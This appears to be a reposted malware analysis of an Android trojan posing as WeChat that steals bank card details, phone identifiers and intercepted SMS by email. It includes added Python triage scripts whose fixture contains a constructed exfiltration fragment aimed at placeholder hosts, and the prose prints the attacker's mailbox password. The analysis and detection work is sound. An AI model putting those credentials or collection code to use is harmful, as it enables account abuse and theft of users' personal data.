Analysis of a packed (hardened) virus disguised as WeChat

Source: Internet
Author: User

Analysis of a disguised, packed virus

Not long ago a disguised virus appeared on the Internet. It had been a long time since I last analysed a virus, so I gave this one a try.

The icon shown after the virus is installed is shown below:

After the application is opened, it prompts the user to activate it as a device administrator:

After activation, the user is asked to enter bank card information, including name, ID card number, and mobile phone number.

In addition, the package name can be found in the AndroidManifest.xml file:

From the above information we can already guess that the disguised application is a virus that steals users' bank accounts and related information.

Decompiling the APK shows that the virus has been packed: the application class is com.secapk.wrapper.ApplicationWrapper, which indicates it was packed with "zookeeper".

Fortunately, an unpacking tool is available on the Internet, so I used it straight away:

Disassemble the dumped odex file into smali, then assemble the smali back into a dex file (if an error occurs during reassembly, comment out the offending part). Then convert the dex into a jar file for viewing. Now all the dirty secrets come out:

The following is a detailed analysis. The app registers two broadcast receivers. The first is used to register the device administrator. The second listens for events such as system boot, SMS reception, and application installation and uninstallation.
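The manifest features described so far (a packer wrapper as the application class, a device-admin receiver, and a receiver for boot, SMS and package events) are exactly what a static triage step should flag before any unpacking is attempted. The following script is an added example, not code from the original post; it parses a decoded AndroidManifest.xml (as apktool would produce) and reports these indicators. The sample manifest embedded in it is constructed for this example; the package name com.example.fakewechat and receiver names are assumptions.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"  # ElementTree key for android:name

# Packer entry class named in the write-up (assumption: a decoded manifest
# carries the class name verbatim as the application's android:name).
PACKER_CLASSES = {"com.secapk.wrapper.ApplicationWrapper"}

# Broadcast actions that together match the behaviour described above.
SUSPICIOUS_ACTIONS = {
    "android.app.action.DEVICE_ADMIN_ENABLED": "requests device-admin activation",
    "android.provider.Telephony.SMS_RECEIVED": "listens for incoming SMS",
    "android.intent.action.BOOT_COMPLETED": "starts at boot",
    "android.intent.action.PACKAGE_REMOVED": "reacts to app uninstall",
    "android.intent.action.PACKAGE_ADDED": "reacts to app install",
}

# Constructed sample manifest modelled on the description in the write-up.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakewechat">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <application android:name="com.secapk.wrapper.ApplicationWrapper"
               android:label="WeChat">
    <receiver android:name=".AdminReceiver">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".SysReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
        <action android:name="android.intent.action.PACKAGE_REMOVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def triage_manifest(xml_text: str) -> dict:
    """Parse a decoded manifest and collect packer / receiver indicators."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    app_class = app.get(NAME_ATTR, "") if app is not None else ""

    findings = []
    if app_class in PACKER_CLASSES:
        findings.append(f"packer wrapper as application class: {app_class}")

    # Map each receiver to the set of actions it filters on.
    receivers = {}
    for recv in root.iter("receiver"):
        recv_name = recv.get(NAME_ATTR, "?")
        actions = {a.get(NAME_ATTR) for a in recv.iter("action")}
        receivers[recv_name] = actions
        for act in sorted(actions & SUSPICIOUS_ACTIONS.keys()):
            findings.append(f"{recv_name}: {SUSPICIOUS_ACTIONS[act]} ({act})")

    perms = {p.get(NAME_ATTR) for p in root.iter("uses-permission")}
    return {
        "package": root.get("package"),
        "application_class": app_class,
        "permissions": sorted(perms),
        "receivers": receivers,
        "findings": findings,
        # A packer plus several of these receivers is the combination seen here.
        "suspicious": app_class in PACKER_CLASSES and len(findings) >= 3,
    }


if __name__ == "__main__":
    result = triage_manifest(SAMPLE_MANIFEST)
    print("package:", result["package"])
    for line in result["findings"]:
        print(" -", line)
    print("suspicious:", result["suspicious"])
```

Run it on the output of `apktool d` (the decoded `AndroidManifest.xml`) instead of the embedded sample; the binary manifest inside the APK must be decoded first, since ElementTree cannot read Android's compiled XML.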

When the application is uninstalled, an email is sent. Its content includes the user's mobile phone number, voicemail number, device ID, IMEI, IMSI, network operator name, and other private information.

When an SMS is received, the attacker can intercept it and obtain the sender, content, and time of the message. The email is sent from lanjiema@126.com, with the password admin903, and the receiving address is 12114860@qq.com.
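Once the jar is decompiled, the exfiltration path described in the last two paragraphs (TelephonyManager identifiers, intercepted SMS fields, and a hard-coded mail account) can be pulled out of the source mechanically. The script below is an added example and not code from the original post: it scans decompiled Java text for the identifier getters, the SmsMessage accessors, JavaMail SMTP properties and email addresses, and flags the combination as likely exfiltration. The Java fragment it contains is constructed for this example; the addresses, host and password in it are placeholders, not the values from the write-up.

```python
import re

# TelephonyManager getters returning the identifiers listed in the write-up
# (real Android API names; which of them the sample calls is what we check).
IDENTIFIER_APIS = {
    "getLine1Number": "phone number",
    "getVoiceMailNumber": "voicemail number",
    "getDeviceId": "device ID / IMEI",
    "getSubscriberId": "IMSI",
    "getNetworkOperatorName": "network operator name",
    "getSimSerialNumber": "SIM serial",
}

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
# JavaMail-style configuration: p.put("mail.smtp.host", "...")
SMTP_RE = re.compile(r'"(mail\.smtp\.[\w.]+)"\s*,\s*"([^"]*)"')
# SmsMessage accessors for sender, body and timestamp of an intercepted SMS.
SMS_FIELDS_RE = re.compile(r"\b(getOriginatingAddress|getMessageBody|getTimestampMillis)\b")

# Constructed Java fragment in the style a decompiler produces from the jar.
SAMPLE_SOURCE = '''
public class MailTask extends AsyncTask<String, Void, Void> {
    static final String USER = "sender@example.invalid";
    static final String PASS = "PLACEHOLDER_PASSWORD";
    static final String TO = "collector@example.invalid";

    Properties props() {
        Properties p = new Properties();
        p.put("mail.smtp.host", "smtp.example.invalid");
        p.put("mail.smtp.auth", "true");
        return p;
    }

    String collect(Context ctx) {
        TelephonyManager tm = (TelephonyManager) ctx.getSystemService("phone");
        StringBuilder sb = new StringBuilder();
        sb.append(tm.getLine1Number()).append(tm.getVoiceMailNumber());
        sb.append(tm.getDeviceId()).append(tm.getSubscriberId());
        sb.append(tm.getNetworkOperatorName());
        return sb.toString();
    }

    void onSms(SmsMessage m) {
        String body = m.getOriginatingAddress() + m.getMessageBody() + m.getTimestampMillis();
        execute(body);
    }
}
'''


def scan_source(src: str) -> dict:
    """Collect exfiltration indicators from decompiled Java source text."""
    identifiers = {api: desc for api, desc in IDENTIFIER_APIS.items()
                   if re.search(r"\b" + api + r"\s*\(", src)}
    emails = sorted(set(EMAIL_RE.findall(src)))
    smtp = dict(SMTP_RE.findall(src))
    sms_fields = sorted(set(SMS_FIELDS_RE.findall(src)))
    # Device identifiers + a mail sink + SMTP configuration is the pattern
    # described in the write-up; any one alone is not conclusive.
    likely = bool(identifiers) and bool(emails) and bool(smtp)
    return {
        "identifier_apis": identifiers,
        "emails": emails,
        "smtp": smtp,
        "sms_fields": sms_fields,
        "likely_exfiltration": likely,
    }


if __name__ == "__main__":
    report = scan_source(SAMPLE_SOURCE)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Point it at the directory of `.java` files a decompiler writes out (concatenate or loop over them) and the email addresses and SMTP hosts it reports become the indicators to block at the mail gateway or search for in other samples.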
